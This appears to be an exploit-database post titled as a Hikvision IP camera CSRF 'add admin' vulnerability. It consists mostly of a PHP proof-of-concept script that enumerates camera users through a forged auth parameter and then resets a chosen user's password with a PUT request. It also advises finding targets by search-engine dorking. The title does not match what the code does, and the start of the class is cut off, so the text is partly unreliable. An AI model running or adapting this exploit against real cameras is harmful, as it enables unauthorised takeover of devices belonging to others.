============================================================================================================================================= | # Title : Hikvision IP Camera CSRF Add ADmin Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) | | # Vendor : https://www.hikvision.com/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] The vulnerability has been present in Hikvision products since 2014. [+] add new admin. [+] Line 104 set your target . [+] save code as poc.php . [+] USage : cmd => c:\www\test\php poc.php [+] PayLoad : target = $target; $this->port = $port; $this->username = $username; $this->password = $password; $this->id = $id; $this->storeCred = $storeCred; } public function check() { $auth = base64_encode("admin:" . $this->generateRandomPassword()); $url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth); $response = $this->sendRequest('GET', $url); if (!$response) { return 'No response received from the target!'; } if ($response['http_code'] == 200) { echo "Following users are available for password reset...\n"; $xml = simplexml_load_string($response['body']); foreach ($xml->User as $user) { echo "USERNAME: " . $user->userName . " | ID: " . $user->id . " | ROLE: " . $user->userLevel . "\n"; } return 'Vulnerable'; } else { return 'Safe'; } } public function exploit() { if ($this->check() !== 'Vulnerable') { return false; } echo "Starting the password reset for {$this->username}...\n"; $postData = "\r\n" . "{$this->id}\r\n" . "{$this->username}\r\n" . "{$this->password}\r\n"; $auth = base64_encode("admin:" . $this->generateRandomPassword()); $url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth); $response = $this->sendRequest('PUT', $url, $postData, 'application/xml'); if (!$response) { echo "Target server did not respond to the password reset request\n"; return false; } if ($response['http_code'] == 200) { echo "Password reset for {$this->username} was successfully completed!\n"; echo "Please log in with your new password: {$this->password}\n"; if ($this->storeCred) { $this->reportCreds(); } } else { echo "Unknown Error. Password reset was not successful!\n"; } } private function sendRequest($method, $url, $data = null, $contentType = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); if ($data) { curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } if ($contentType) { curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: $contentType"]); } $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return ['http_code' => $http_code, 'body' => $response]; } private function generateRandomPassword($length = 10) { return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, $length); } private function reportCreds() { // In a real implementation, you could store the credentials into a database echo "Credentials for {$this->username} were added to the database...\n"; } } // Example usage $exploit = new HikvisionExploit('target-ip'); $exploit->exploit(); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================